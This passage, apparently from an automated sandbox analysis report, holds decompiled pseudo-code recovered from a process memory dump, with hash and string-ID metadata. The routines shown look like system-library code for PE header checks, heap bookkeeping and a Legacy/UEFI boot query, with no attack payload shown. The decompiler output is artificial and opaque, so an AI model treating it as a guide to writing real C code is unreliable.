                                                														if(_t356 == 0) {
                                                															L143:
                                                															_v8 = 0xfffffffe;
                                                															_t211 = 0xc0000089;
                                                														} else {
                                                															_v36 = 0;
                                                															_v60 = 0;
                                                															_v48 = 0;
                                                															_v68 = 0;
                                                															_v44 = _t290 & 0xfffffffc;
                                                															E00AAE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                                                															_t306 = _v68;
                                                															__eflags = _t306;
                                                															if(_t306 == 0) {
                                                																_t216 = 0xc000007b;
                                                																_v36 = 0xc000007b;
                                                																_t307 = _v60;
                                                															} else {
                                                																__eflags = _t290 & 0x00000001;
                                                																if(__eflags == 0) {
                                                																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                                                																	__eflags = _t349 - 0x10b;
                                                																	if(_t349 != 0x10b) {
                                                																		__eflags = _t349 - 0x20b;
                                                																		if(_t349 == 0x20b) {
                                                																			goto L102;
                                                																		} else {
                                                																			_t307 = 0;
                                                																			_v48 = 0;
                                                																			_t216 = 0xc000007b;
                                                																			_v36 = 0xc000007b;
                                                																			goto L71;
                                                																		}
                                                																	} else {
                                                																		L102:
                                                																		_t307 =  *(_t306 + 0x50);
                                                																		goto L69;
                                                																	}
                                                																	goto L151;
                                                																} else {
                                                																	_t239 = L00AAEAEA(_t290, _t290, _t356, _t366, __eflags);
                                                																	_t307 = _t239;
                                                																	_v60 = _t307;
                                                																	_v48 = _t307;
                                                																	__eflags = _t307;
                                                																	if(_t307 != 0) {
                                                																		L70:
                                                																		_t216 = _v36;
                                                																	} else {
                                                																		_push(_t239);
                                                																		_push(0x14);
                                                																		_push( &_v144);
                                                																		_push(3);
                                                																		_push(_v44);
                                                																		_push(0xffffffff);
                                                																		_t319 = L00AD9730();
                                                																		_v36 = _t319;
                                                																		__eflags = _t319;
                                                																		if(_t319 < 0) {
                                                																			_t216 = 0xc000001f;
                                                																			_v36 = 0xc000001f;
                                                																			_t307 = _v60;
                                                																		} else {
                                                																			_t307 = _v132;
                                                																			L69:
                                                																			_v48 = _t307;
                                                																			goto L70;
                                                																		}
                                                																	}
                                                																}
                                                															}
                                                															L71:
                                                															_v72 = _t307;
                                                															_v84 = _t216;
                                                															__eflags = _t216 - 0xc000007b;
                                                															if(_t216 == 0xc000007b) {
                                                																L150:
                                                																_v8 = 0xfffffffe;
                                                																_t211 = 0xc000007b;
                                                															} else {
                                                																_t344 = _t290 & 0xfffffffc;
                                                																_v76 = _t344;
                                                																__eflags = _v40 - _t344;
                                                																if(_v40 <= _t344) {
                                                																	goto L150;
                                                																} else {
                                                																	__eflags = _t307;
                                                																	if(_t307 == 0) {
                                                																		L75:
                                                																		_t217 = 0;
                                                																		_v104 = 0;
                                                																		__eflags = _t366;
                                                																		if(_t366 != 0) {
                                                																			__eflags = _t290 & 0x00000001;
                                                																			if((_t290 & 0x00000001) != 0) {
                                                																				_t217 = 1;
                                                																				_v104 = 1;
                                                																			}
                                                																			_t290 = _v44;
                                                																			_v52 = _t290;
                                                																		}
                                                																		__eflags = _t217 - 1;
                                                																		if(_t217 != 1) {
                                                																			_t369 = 0;
                                                																			_t218 = _v40;
                                                																			goto L91;
                                                																		} else {
                                                																			_v64 = 0;
                                                																			E00AAE9C0(1, _t290, 0, 0,  &_v64);
                                                																			_t309 = _v64;
                                                																			_v108 = _t309;
                                                																			__eflags = _t309;
                                                																			if(_t309 == 0) {
                                                																				goto L143;
                                                																			} else {
                                                																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                                                																				__eflags = _t226 - 0x10b;
                                                																				if(_t226 != 0x10b) {
                                                																					__eflags = _t226 - 0x20b;
                                                																					if(_t226 != 0x20b) {
                                                																						goto L143;
                                                																					} else {
                                                																						_t371 =  *(_t309 + 0x98);
                                                																						goto L83;
                                                																					}
                                                																				} else {
                                                																					_t371 =  *(_t309 + 0x88);
                                                																					L83:
                                                																					__eflags = _t371;
                                                																					if(_t371 != 0) {
                                                																						_v80 = _t371 - _t356 + _t290;
                                                																						_t310 = _v64;
                                                																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                                                																						_t292 =  *(_t310 + 6) & 0x0000ffff;
                                                																						_t311 = 0;
                                                																						__eflags = 0;
                                                																						while(1) {
                                                																							_v120 = _t311;
                                                																							_v116 = _t348;
                                                																							__eflags = _t311 - _t292;
                                                																							if(_t311 >= _t292) {
                                                																								goto L143;
                                                																							}
                                                																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
                                                																							__eflags = _t371 - _t359;
                                                																							if(_t371 < _t359) {
                                                																								L98:
                                                																								_t348 = _t348 + 0x28;
                                                																								_t311 = _t311 + 1;
                                                																								continue;
                                                																							} else {
                                                																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                                                																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                                                																									goto L98;
                                                																								} else {
                                                																									__eflags = _t348;
                                                																									if(_t348 == 0) {
                                                																										goto L143;
                                                																									} else {
                                                																										_t218 = _v40;
                                                																										_t312 =  *_t218;
                                                																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                                                																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                                                																											_v100 = _t359;
                                                																											_t360 = _v108;
                                                																											_t372 = L00AA8F44(_v108, _t312);
                                                																											__eflags = _t372;
                                                																											if(_t372 == 0) {
                                                																												goto L143;
                                                																											} else {
                                                																												_t290 = _v52;
                                                																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E00AD3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                                                																												_t307 = _v72;
                                                																												_t344 = _v76;
                                                																												_t218 = _v40;
                                                																												goto L91;
                                                																											}
                                                																										} else {
                                                																											_t290 = _v52;
                                                																											_t307 = _v72;
                                                																											_t344 = _v76;
                                                																											_t369 = _v80;
                                                																											L91:
                                                																											_t358 = _a4;
                                                																											__eflags = _t358;
                                                																											if(_t358 == 0) {
                                                																												L95:
                                                																												_t308 = _a8;
                                                																												__eflags = _t308;
                                                																												if(_t308 != 0) {
                                                																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
                                                																												}
                                                																												_v8 = 0xfffffffe;
                                                																												_t211 = _v84;
                                                																											} else {
                                                																												_t370 =  *_t218 - _t369 + _t290;
                                                																												 *_t358 = _t370;
                                                																												__eflags = _t370 - _t344;
                                                																												if(_t370 <= _t344) {
                                                																													L149:
                                                																													 *_t358 = 0;
                                                																													goto L150;
                                                																												} else {
                                                																													__eflags = _t307;
                                                																													if(_t307 == 0) {
                                                																														goto L95;
                                                																													} else {
                                                																														__eflags = _t370 - _t344 + _t307;
                                                																														if(_t370 >= _t344 + _t307) {
                                                																															goto L149;
                                                																														} else {
                                                																															goto L95;
                                                																														}
                                                																													}
                                                																												}
                                                																											}
                                                																										}
                                                																									}
                                                																								}
                                                																							}
                                                																							goto L97;
                                                																						}
                                                																					}
                                                																					goto L143;
                                                																				}
                                                																			}
                                                																		}
                                                																	} else {
                                                																		__eflags = _v40 - _t307 + _t344;
                                                																		if(_v40 >= _t307 + _t344) {
                                                																			goto L150;
                                                																		} else {
                                                																			goto L75;
                                                																		}
                                                																	}
                                                																}
                                                															}
                                                														}
                                                														L97:
                                                														 *[fs:0x0] = _v20;
                                                														return _t211;
                                                													}
                                                												}
                                                											}
                                                										}
                                                									} else {
                                                										goto L46;
                                                									}
                                                								}
                                                								goto L151;
                                                							}
                                                							_t288 = _v164;
                                                							_t366 = 0xc0000135;
                                                							goto L41;
                                                						}
                                                					}
                                                				}
                                                				L151:
                                                			}
                                                0x00aadbff
                                                0x00aadbf1
                                                0x00aadbdf
                                                0x00aadb8f
                                                0x00aadb92
                                                0x00aadb95
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00aadb95
                                                0x00aadb8d
                                                0x00aadb85
                                                0x00aadb74
                                                0x00aadc9f
                                                0x00aadca2
                                                0x00aadcb0
                                                0x00aadcb0
                                                0x00aadad1
                                                0x00afb4e5
                                                0x00afb4c8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00aad831
                                                0x00000000
                                                0x00aad800
                                                0x00afb47f
                                                0x00afb485
                                                0x00000000
                                                0x00afb485
                                                0x00aad665
                                                0x00aad652
                                                0x00000000

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: H/c$X*c
                                                • API String ID: 0-886039989
                                                • Opcode ID: 653e74a5533eddaf27fb17c2e450af8721cd4592c1c179db7982725ebd40dafd
                                                • Instruction ID: ef51db63da0d37be4952d2fe29f7177d477fa1c7f31300883faf62e5be791cba
                                                • Opcode Fuzzy Hash: 653e74a5533eddaf27fb17c2e450af8721cd4592c1c179db7982725ebd40dafd
                                                • Instruction Fuzzy Hash: E9E1C230A00359CFDB34DF68C944BB9B7B2BF46304F144199E98A9BAE1DB349D81CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 60%
                                                			E00B5E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                                				signed int _v20;
                                                				char _v24;
                                                				signed int _v40;
                                                				char _v44;
                                                				intOrPtr _v48;
                                                				signed int _v52;
                                                				unsigned int _v56;
                                                				char _v60;
                                                				signed int _v64;
                                                				char _v68;
                                                				signed int _v72;
                                                				void* __ebx;
                                                				void* __edi;
                                                				char _t87;
                                                				signed int _t90;
                                                				signed int _t94;
                                                				signed int _t100;
                                                				intOrPtr* _t113;
                                                				signed int _t122;
                                                				void* _t132;
                                                				void* _t135;
                                                				signed int _t139;
                                                				signed int* _t141;
                                                				signed int _t146;
                                                				signed int _t147;
                                                				void* _t153;
                                                				signed int _t155;
                                                				signed int _t159;
                                                				char _t166;
                                                				void* _t172;
                                                				void* _t176;
                                                				signed int _t177;
                                                				intOrPtr* _t179;
                                                
                                                				_t179 = __ecx;
                                                				_v48 = __edx;
                                                				_v68 = 0;
                                                				_v72 = 0;
                                                				_push(__ecx[1]);
                                                				_push( *__ecx);
                                                				_push(0);
                                                				_t153 = 0x14;
                                                				_t135 = _t153;
                                                				_t132 = E00B5BBBB(_t135, _t153);
                                                				if(_t132 == 0) {
                                                					_t166 = _v68;
                                                					goto L43;
                                                				} else {
                                                					_t155 = 0;
                                                					_v52 = 0;
                                                					asm("stosd");
                                                					asm("stosd");
                                                					asm("stosd");
                                                					asm("stosd");
                                                					asm("stosd");
                                                					_v56 = __ecx[1];
                                                					if( *__ecx >> 8 < 2) {
                                                						_t155 = 1;
                                                						_v52 = 1;
                                                					}
                                                					_t139 = _a4;
                                                					_t87 = (_t155 << 0xc) + _t139;
                                                					_v60 = _t87;
                                                					if(_t87 < _t139) {
                                                						L11:
                                                						_t166 = _v68;
                                                						L12:
                                                						if(_t132 != 0) {
                                                							E00B5BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                                						}
                                                						L43:
                                                						if(_v72 != 0) {
                                                							_push( *((intOrPtr*)(_t179 + 4)));
                                                							_push( *_t179);
                                                							_push(0x8000);
                                                							L00B5AFDE( &_v72,  &_v60);
                                                						}
                                                						L46:
                                                						return _t166;
                                                					}
                                                					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                                					asm("sbb edi, edi");
                                                					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                                					if(_t90 != 0) {
                                                						_push(0);
                                                						_push(0x14);
                                                						_push( &_v44);
                                                						_push(3);
                                                						_push(_t179);
                                                						_push(0xffffffff);
                                                						if(L00AD9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                                							_push(_t139);
                                                							E00B5A80D(_t179, 1, _v40, 0);
                                                							_t172 = 4;
                                                						}
                                                					}
                                                					_t141 =  &_v72;
                                                					if(E00B5A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                                						_v64 = _a4;
                                                						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                                						asm("sbb edi, edi");
                                                						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                                						if(_t94 != 0) {
                                                							_push(0);
                                                							_push(0x14);
                                                							_push( &_v24);
                                                							_push(3);
                                                							_push(_t179);
                                                							_push(0xffffffff);
                                                							if(L00AD9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                                								_push(_t141);
                                                								E00B5A80D(_t179, 1, _v20, 0);
                                                								_t176 = 4;
                                                							}
                                                						}
                                                						if(E00B5A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                                							goto L11;
                                                						} else {
                                                							_t177 = _v64;
                                                							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                                							_t100 = _v52 + _v52;
                                                							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                                							 *(_t132 + 0x10) = _t146;
                                                							asm("bsf eax, [esp+0x18]");
                                                							_v52 = _t100;
                                                							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                                							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                                							_t47 =  &_a8;
                                                							 *_t47 = _a8 & 0x00000001;
                                                							if( *_t47 == 0) {
                                                								E00AB2280(_t179 + 0x30, _t179 + 0x30);
                                                							}
                                                							_t147 =  *(_t179 + 0x34);
                                                							_t159 =  *(_t179 + 0x38) & 1;
                                                							_v68 = 0;
                                                							if(_t147 == 0) {
                                                								L35:
                                                								E00AAB090(_t179 + 0x34, _t147, _v68, _t132);
                                                								if(_a8 == 0) {
                                                									L00AAFFB0(_t132, _t177, _t179 + 0x30);
                                                								}
                                                								asm("lock xadd [eax], ecx");
                                                								asm("lock xadd [eax], edx");
                                                								_t132 = 0;
                                                								_v72 = _v72 & 0;
                                                								_v68 = _v72;
                                                								if(E00AB7D50() == 0) {
                                                									_t113 = 0x7ffe0388;
                                                								} else {
                                                									_t177 = _v64;
                                                									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                								}
                                                								if( *_t113 == _t132) {
                                                									_t166 = _v68;
                                                									goto L46;
                                                								} else {
                                                									_t166 = _v68;
                                                									E00B4FEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                                									goto L12;
                                                								}
                                                							} else {
                                                								L23:
                                                								while(1) {
                                                									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                                										_t122 =  *_t147;
                                                										if(_t159 == 0) {
                                                											L32:
                                                											if(_t122 == 0) {
                                                												L34:
                                                												_v68 = 0;
                                                												goto L35;
                                                											}
                                                											L33:
                                                											_t147 = _t122;
                                                											continue;
                                                										}
                                                										if(_t122 == 0) {
                                                											goto L34;
                                                										}
                                                										_t122 = _t122 ^ _t147;
                                                										goto L32;
                                                									}
                                                									_t122 =  *(_t147 + 4);
                                                									if(_t159 == 0) {
                                                										L27:
                                                										if(_t122 != 0) {
                                                											goto L33;
                                                										}
                                                										L28:
                                                										_v68 = 1;
                                                										goto L35;
                                                									}
                                                									if(_t122 == 0) {
                                                										goto L28;
                                                									}
                                                									_t122 = _t122 ^ _t147;
                                                									goto L27;
                                                								}
                                                							}
                                                						}
                                                					}
                                                					_v72 = _v72 & 0x00000000;
                                                					goto L11;
                                                				}
                                                			}


                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: `$`
                                                • API String ID: 0-197956300
                                                • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                • Instruction ID: 1ad40a88607d05e013ffce687190feddfc012ee6ff2a98aa2e89bbb5f76e8ce7
                                                • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                • Instruction Fuzzy Hash: 7491BE712043419FE728CE25C941B1BB7E5FF88715F1489ADF9A9CB280E770EA08CB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E00B151BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                				signed short* _t63;
                                                				signed int _t64;
                                                				signed int _t65;
                                                				signed int _t67;
                                                				intOrPtr _t74;
                                                				intOrPtr _t84;
                                                				intOrPtr _t88;
                                                				intOrPtr _t94;
                                                				void* _t100;
                                                				void* _t103;
                                                				intOrPtr _t105;
                                                				signed int _t106;
                                                				short* _t108;
                                                				signed int _t110;
                                                				signed int _t113;
                                                				signed int* _t115;
                                                				signed short* _t117;
                                                				void* _t118;
                                                				void* _t119;
                                                
                                                				_push(0x80);
                                                				_push(0xb705f0);
                                                				E00AED0E8(__ebx, __edi, __esi);
                                                				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                                				_t115 =  *(_t118 + 0xc);
                                                				 *(_t118 - 0x7c) = _t115;
                                                				 *((char*)(_t118 - 0x65)) = 0;
                                                				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                				_t113 = 0;
                                                				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                                				 *((intOrPtr*)(_t118 - 4)) = 0;
                                                				_t100 = __ecx;
                                                				if(_t100 == 0) {
                                                					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                					E00AAEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                					 *((char*)(_t118 - 0x65)) = 1;
                                                					_t63 =  *(_t118 - 0x90);
                                                					_t101 = _t63[2];
                                                					_t64 =  *_t63 & 0x0000ffff;
                                                					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                					L20:
                                                					_t65 = _t64 >> 1;
                                                					L21:
                                                					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                                					if(_t108 == 0) {
                                                						L27:
                                                						 *_t115 = _t65 + 1;
                                                						_t67 = 0xc0000023;
                                                						L28:
                                                						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                                						L29:
                                                						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                                						E00B153CA(0);
                                                						return E00AED130(0, _t113, _t115);
                                                					}
                                                					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                                						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                                							 *_t108 = 0;
                                                						}
                                                						goto L27;
                                                					}
                                                					 *_t115 = _t65;
                                                					_t115 = _t65 + _t65;
                                                					E00ADF3E0(_t108, _t101, _t115);
                                                					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                                					_t67 = 0;
                                                					goto L28;
                                                				}
                                                				_t103 = _t100 - 1;
                                                				if(_t103 == 0) {
                                                					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                                					_t74 = E00AB3690(1, _t117, 0xa71810, _t118 - 0x74);
                                                					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                                					_t101 = _t117[2];
                                                					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                					if(_t74 < 0) {
                                                						_t64 =  *_t117 & 0x0000ffff;
                                                						_t115 =  *(_t118 - 0x7c);
                                                						goto L20;
                                                					}
                                                					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                                					_t115 =  *(_t118 - 0x7c);
                                                					goto L21;
                                                				}
                                                				if(_t103 == 1) {
                                                					_t105 = 4;
                                                					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                                					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                                					_push(_t118 - 0x70);
                                                					_push(0);
                                                					_push(0);
                                                					_push(_t105);
                                                					_push(_t118 - 0x78);
                                                					_push(0x6b);
                                                					 *((intOrPtr*)(_t118 - 0x64)) = E00ADAA90();
                                                					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                					_t113 = L00AB4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                                					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                                					if(_t113 != 0) {
                                                						_push(_t118 - 0x70);
                                                						_push( *((intOrPtr*)(_t118 - 0x70)));
                                                						_push(_t113);
                                                						_push(4);
                                                						_push(_t118 - 0x78);
                                                						_push(0x6b);
                                                						_t84 = E00ADAA90();
                                                						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                                						if(_t84 < 0) {
                                                							goto L29;
                                                						}
                                                						_t110 = 0;
                                                						_t106 = 0;
                                                						while(1) {
                                                							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                                							 *(_t118 - 0x88) = _t106;
                                                							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                                								break;
                                                							}
                                                							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                                							_t106 = _t106 + 1;
                                                						}
                                                						_t88 = E00B1500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                                						_t119 = _t119 + 0x1c;
                                                						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                                						if(_t88 < 0) {
                                                							goto L29;
                                                						}
                                                						_t101 = _t118 - 0x3c;
                                                						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                                						goto L21;
                                                					}
                                                					_t67 = 0xc0000017;
                                                					goto L28;
                                                				}
                                                				_push(0);
                                                				_push(0x20);
                                                				_push(_t118 - 0x60);
                                                				_push(0x5a);
                                                				_t94 = E00AD9860();
                                                				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                                				if(_t94 < 0) {
                                                					goto L29;
                                                				}
                                                				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                                					_t101 = L"Legacy";
                                                					_push(6);
                                                				} else {
                                                					_t101 = L"UEFI";
                                                					_push(4);
                                                				}
                                                				_pop(_t65);
                                                				goto L21;
                                                			}























                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Legacy$UEFI
                                                • API String ID: 2994545307-634100481
                                                • Opcode ID: ab34b8881481cdc59fb161304b616e144e16a8032808e5cfd40ef360672f9252
                                                • Instruction ID: 46b478e4f7f74edddaa6157f2f7423518f9f7b719f94574b3fc2fa95b8a09bc0
                                                • Opcode Fuzzy Hash: ab34b8881481cdc59fb161304b616e144e16a8032808e5cfd40ef360672f9252
                                                • Instruction Fuzzy Hash: 3D518E71E00A18DFDB24DFA8D980AAEB7F8FF88740F54806DE51AEB251D6709980CB54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E00A9B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                                				signed int _t65;
                                                				signed short _t69;
                                                				intOrPtr _t70;
                                                				signed short _t85;
                                                				void* _t86;
                                                				signed short _t89;
                                                				signed short _t91;
                                                				intOrPtr _t92;
                                                				intOrPtr _t97;
                                                				intOrPtr* _t98;
                                                				signed short _t99;
                                                				signed short _t101;
                                                				void* _t102;
                                                				char* _t103;
                                                				signed short _t104;
                                                				intOrPtr* _t110;
                                                				void* _t111;
                                                				void* _t114;
                                                				intOrPtr* _t115;
                                                
                                                				_t109 = __esi;
                                                				_t108 = __edi;
                                                				_t106 = __edx;
                                                				_t95 = __ebx;
                                                				_push(0x90);
                                                				_push(0xb6f7a8);
                                                				E00AED0E8(__ebx, __edi, __esi);
                                                				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                                				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                                				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                                				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                                				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                                				if(__edx == 0xffffffff) {
                                                					L6:
                                                					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                                					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                                					__eflags = _t65 & 0x00000002;
                                                					if((_t65 & 0x00000002) != 0) {
                                                						L3:
                                                						L4:
                                                						return E00AED130(_t95, _t108, _t109);
                                                					}
                                                					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                                					_t108 = 0;
                                                					_t109 = 0;
                                                					_t95 = 0;
                                                					__eflags = 0;
                                                					while(1) {
                                                						__eflags = _t95 - 0x200;
                                                						if(_t95 >= 0x200) {
                                                							break;
                                                						}
                                                						E00ADD000(0x80);
                                                						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                                						_t108 = _t115;
                                                						_t95 = _t95 - 0xffffff80;
                                                						_t17 = _t114 - 4;
                                                						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                                						__eflags =  *_t17;
                                                						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                                						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                                						_t102 = _t110 + 1;
                                                						do {
                                                							_t85 =  *_t110;
                                                							_t110 = _t110 + 1;
                                                							__eflags = _t85;
                                                						} while (_t85 != 0);
                                                						_t111 = _t110 - _t102;
                                                						_t21 = _t95 - 1; // -129
                                                						_t86 = _t21;
                                                						__eflags = _t111 - _t86;
                                                						if(_t111 > _t86) {
                                                							_t111 = _t86;
                                                						}
                                                						E00ADF3E0(_t108, _t106, _t111);
                                                						_t115 = _t115 + 0xc;
                                                						_t103 = _t111 + _t108;
                                                						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                                						_t89 = _t95 - _t111;
                                                						__eflags = _t89;
                                                						_push(0);
                                                						if(_t89 == 0) {
                                                							L15:
                                                							_t109 = 0xc000000d;
                                                							goto L16;
                                                						} else {
                                                							__eflags = _t89 - 0x7fffffff;
                                                							if(_t89 <= 0x7fffffff) {
                                                								L16:
                                                								 *(_t114 - 0x94) = _t109;
                                                								__eflags = _t109;
                                                								if(_t109 < 0) {
                                                									__eflags = _t89;
                                                									if(_t89 != 0) {
                                                										 *_t103 = 0;
                                                									}
                                                									L26:
                                                									 *(_t114 - 0xa0) = _t109;
                                                									 *(_t114 - 4) = 0xfffffffe;
                                                									__eflags = _t109;
                                                									if(_t109 >= 0) {
                                                										L31:
                                                										_t98 = _t108;
                                                										_t39 = _t98 + 1; // 0x1
                                                										_t106 = _t39;
                                                										do {
                                                											_t69 =  *_t98;
                                                											_t98 = _t98 + 1;
                                                											__eflags = _t69;
                                                										} while (_t69 != 0);
                                                										_t99 = _t98 - _t106;
                                                										__eflags = _t99;
                                                										L34:
                                                										_t70 =  *[fs:0x30];
                                                										__eflags =  *((char*)(_t70 + 2));
                                                										if( *((char*)(_t70 + 2)) != 0) {
                                                											L40:
                                                											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                                											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                                											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                                											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                                											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                                											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                                											 *(_t114 - 4) = 1;
                                                											_push(_t114 - 0x74);
                                                											L00AEDEF0(_t99, _t106);
                                                											 *(_t114 - 4) = 0xfffffffe;
                                                											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                											goto L3;
                                                										}
                                                										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                                										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                                											goto L40;
                                                										}
                                                										_push( *((intOrPtr*)(_t114 + 8)));
                                                										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                                										_push(_t99 & 0x0000ffff);
                                                										_push(_t108);
                                                										_push(1);
                                                										_t101 = E00ADB280();
                                                										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                                										if( *((char*)(_t114 + 0x14)) == 1) {
                                                											__eflags = _t101 - 0x80000003;
                                                											if(_t101 == 0x80000003) {
                                                												L00ADB7E0(1);
                                                												_t101 = 0;
                                                												__eflags = 0;
                                                											}
                                                										}
                                                										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                										goto L4;
                                                									}
                                                									__eflags = _t109 - 0x80000005;
                                                									if(_t109 == 0x80000005) {
                                                										continue;
                                                									}
                                                									break;
                                                								}
                                                								 *(_t114 - 0x90) = 0;
                                                								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                                								_t91 = E00ADE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                                								_t115 = _t115 + 0x10;
                                                								_t104 = _t91;
                                                								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                                								__eflags = _t104;
                                                								if(_t104 < 0) {
                                                									L21:
                                                									_t109 = 0x80000005;
                                                									 *(_t114 - 0x90) = 0x80000005;
                                                									L22:
                                                									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
